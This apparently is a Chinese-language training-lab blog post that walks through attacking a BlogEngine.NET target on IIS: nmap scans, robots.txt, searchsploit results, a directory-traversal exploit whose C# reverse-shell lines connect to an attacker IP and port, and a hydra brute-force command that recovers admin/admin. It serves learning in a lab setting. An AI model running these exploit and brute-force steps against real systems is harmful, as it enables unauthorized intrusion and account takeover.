這一題是7/10進度,而這個模組名稱在Day 19出現過,是的~就是不見的那台靶機。nmap掃描完畢之後系統提示**-Pn**,有高度的可能性是Windows系統所以無法用ICMP探測。
┌──(kali㉿vbox)-[~]
└─$ sudo nmap -Pn -T4 172.16.x.x
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 03:53 EDT
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 99.99% done; ETC: 03:53 (0:00:00 remaining)
Nmap scan report for 172.16.x.x
Host is up (0.37s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8888/tcp open sun-answerbook
Nmap done: 1 IP address (1 host up) scanned in 30.81 seconds
┌──(kali㉿vbox)-[~]
└─$ sudo nmap -sC -sV -Pn -p8888 172.16.x.x
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 03:48 EDT
Nmap scan report for 172.16.x.x
Host is up (0.57s latency).
PORT STATE SERVICE VERSION
8888/tcp open http Microsoft IIS httpd 10.0
|_http-title: 403 - \xB8T\xA4\xEE: \xA9\xDA\xB5\xB4\xA6s\xA8\xFA\xA1C
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-robots.txt: 1 disallowed entry
|_/BlogEngine
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.48 seconds
這裡培訓課程第二天和我們前面的做法相似,建立大家成為攻擊手的SOP,所以將前測的作業拿來練習,只是為什麼前幾天寫文章的時候會不能掃描也不清楚原因。本來想呈現0到1成為攻擊手的過程這是個很重要的參考,從自己在前測打靶機的方式與講師教學的方式進行比對。但,人家的靶機還留著可以連就該偷笑了😊
課程當日講師SOP建立如下:(多了一些我不曾知道的工具)
我自己從HTB那邊的經驗還多了一個習慣是去看robots.txt,跟whatweb差不多雖然會透露一些訊息但大部分時候沒有用。
┌──(kali㉿vbox)-[~]
└─$ curl 172.16.x.x:8888/robots.txt
User-agent: *
Disallow: /BlogEngine
第二天的課程其實只到這裡就結束了這個單元,接著跑去玩hydra工具猜密碼。我上課時發現有學員對網站系統不了解,這裡特別拉出來說明一下,目前找到的admin/admin只能用來登入網站後台,以HTB的訓練來說分成以下四個階段。
因此對這台靶機,拿到網站管理者帳密之後。首先到處逛逛看哪邊可以塞shell進去,找XSS去塞。再來呢就是回到講師的步驟5看看google怎麼說,這一套網站管理程式可能已經有人進行漏洞復現工程可以參考。我這邊呢從HTB那裡學到可以不必登入exploit.db的指令searchsploit。
┌──(kali㉿vbox)-[~]
└─$ searchsploit BlogEngine
--------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------- ---------------------------------
BlogEngine 3.3 - 'syndication.axd' XML Exter | xml/webapps/48422.txt
BlogEngine 3.3 - XML External Entity Injecti | windows/webapps/46106.txt
BlogEngine 3.3.8 - 'Content' Stored XSS | aspx/webapps/48999.txt
BlogEngine.NET 1.4 - 'search.aspx' Cross-Sit | asp/webapps/32874.txt
BlogEngine.NET 1.6 - Directory Traversal / I | asp/webapps/35168.txt
BlogEngine.NET 3.3.6 - Directory Traversal / | aspx/webapps/46353.cs
BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Direc | aspx/webapps/47010.py
BlogEngine.NET 3.3.6/3.3.7 - 'path' Director | aspx/webapps/47035.py
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' | aspx/webapps/47011.py
BlogEngine.NET 3.3.6/3.3.7 - XML External En | aspx/webapps/47014.py
--------------------------------------------- ---------------------------------
Shellcodes: No Results
全部試完一遍我最後選擇BlogEngine.NET 3.3.6 - Directory Traversal / | aspx/webapps/46353.cs。
- Finally, the vulnerability is triggered by accessing the base URL for the
- blog with a theme override specified like so:
- http://10.10.10.10/?theme=../../App_Data/files
需要修改cs以下內容為自己的IP和port給nc使用,這個部分先進行到這邊。正常不能期待總是碰到admin/admin,所以下一篇會回到前面一點點的進度,遇到不是預設要怎麼猜密碼? 上課的講師也有強調猜密碼是最後的手段!只是我們如果遇到系統漏洞必須先登入才能利用,可預設帳密已經改掉只能執行猜帳密這個手段。
using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient("10.10.10.20", 4445)) {
using(System.IO.Stream stream = client.GetStream()) {
猜密碼我自己比較常用hydra通常甚麼也沒猜出來,但是這一題需要設定BrupSuite。應該可以理解為hydra可以用ssh、smb等指令連線時的密碼碰撞,可本題BlogEngine是個網頁服務,猜起來就會需要多費一些工。這裡安裝的部分就跳過,先把BrupSuit的proxy打開監聽登入會送出的內容。
http://172.16.x.x:8888/BlogEngine/Account/login.aspx
POST /BlogEngine/Account/login.aspx?ReturnURL=%2fBlogEngine%2fadmin%2f HTTP/1.1
Host: 172.16.x.x:8888
Content-Length: 610
Cache-Control: max-age=0
Accept-Language: zh-TW
Upgrade-Insecure-Requests: 1
Origin: http://172.16.x.x:8888
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.16.x.x:8888/BlogEngine/Account/login.aspx?ReturnURL=/BlogEngine/admin/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
__VIEWSTATE=9w0Aga2URZktOr2CJtvW%2B15ic10jp40maFSqKQ2mrsGeXikCcbHgdF2JqAJEvEPJ8yd3m7Pt364kkuqaQJwoUgeSWjnEHe95IKi4eHDHF%2B5wJma6JMHFFnLLpm%2FS7rm5O%2Boqga%2B582i0vnD4j6MZ4JaoX2ImcWxm2tdeafmqhXy0GxOF&__VIEWSTATEGENERATOR=F75D4323&__EVENTVALIDATION=YJCJTlug3YiA0ROziuZWld9mFX9NQv73SuPiRdJunQFVPt%2F%2B9j%2Btbpx2rme%2B2OoyFLdBJOLZMUDgKXR5CsgwxADu%2FTWLM7DwtdWKDKW7j3a8fjZ6QiMqZ3N%2FnoRcJb8cwQD%2B%2BQNedaiLQ68yS3g2Drdg5a%2ByXh3TEKWCQSqRevIpH0qR&ctl00%24MainContent%24LoginUser%24UserName=username&ctl00%24MainContent%24LoginUser%24Password=password&ctl00%24MainContent%24LoginUser%24LoginButton=%E7%99%BB%E5%85%A5
我們要先找到登入失敗網頁中會出現的關鍵字Login failed(不一定寫甚麼錯誤訊息),在brupsuite收到post找到後面這段文字LoginUser%24UserName=username&ctl00%24MainContent%24LoginUser%24Password=password然後把帳密更改^USER^, ^PASS^,這組密碼沒有甚麼難度所以應該很快就可以撞出來。
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-30 11:04:23
[ERROR] the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^
└─$ hydra -l admin -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt 172.16.x.x http-post-form "/BlogEngine/Account/login.aspx?ReturnURL=%2fBlogEngine%2fadmin%2f:__VIEWSTATE=HM6WjiJeuA8aoKm0YG43iBU54MOqCPlOua7%2Fd%2BOuuk7Tfoqz%2F8aI039%2FwoSLzNTnqhdDj2SmIGG5kUmtmcEa%2ByvRe0EK6gxaSOc2Jf62eLhZZZIge2msAUdAATL25yh4pj0CT4CsXwfo6rFg%2Fl38sUwDOQKuc2RH6POW3GJ16MN43Eyi&__VIEWSTATEGENERATOR=F75D4323&__EVENTVALIDATION=63WpDhcildbumqgZO7hirCpbguDVAwYA82zXiFliPQg60hwhd5FgsoHqSJw%2FIPe1FSf5288%2FnDUw%2FwqqlHpOF%2FJ77%2FjFeMnyPuaVHiO9J1GgghW00jc3KUuNFLqD1AQZVAjdGRIkcYZctw6v0KS%2BupqorC7BZKe8eW%2FbycfvyrpPIi7F&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed" -s 8888
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-09-30 11:05:45
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 100000 login tries (l:1/p:100000), ~6250 tries per task
[DATA] attacking http-post-form://172.16.x.x:8888/BlogEngine/Account/login.aspx?ReturnURL=%2fBlogEngine%2fadmin%2f:__VIEWSTATE=HM6WjiJeuA8aoKm0YG43iBU54MOqCPlOua7%2Fd%2BOuuk7Tfoqz%2F8aI039%2FwoSLzNTnqhdDj2SmIGG5kUmtmcEa%2ByvRe0EK6gxaSOc2Jf62eLhZZZIge2msAUdAATL25yh4pj0CT4CsXwfo6rFg%2Fl38sUwDOQKuc2RH6POW3GJ16MN43Eyi&__VIEWSTATEGENERATOR=F75D4323&__EVENTVALIDATION=63WpDhcildbumqgZO7hirCpbguDVAwYA82zXiFliPQg60hwhd5FgsoHqSJw%2FIPe1FSf5288%2FnDUw%2FwqqlHpOF%2FJ77%2FjFeMnyPuaVHiO9J1GgghW00jc3KUuNFLqD1AQZVAjdGRIkcYZctw6v0KS%2BupqorC7BZKe8eW%2FbycfvyrpPIi7F&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed
[8888][http-post-form] host: 172.16.x.x login: admin password: admin
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-09-30 11:06:35
iThome鐵人賽
看影片追技術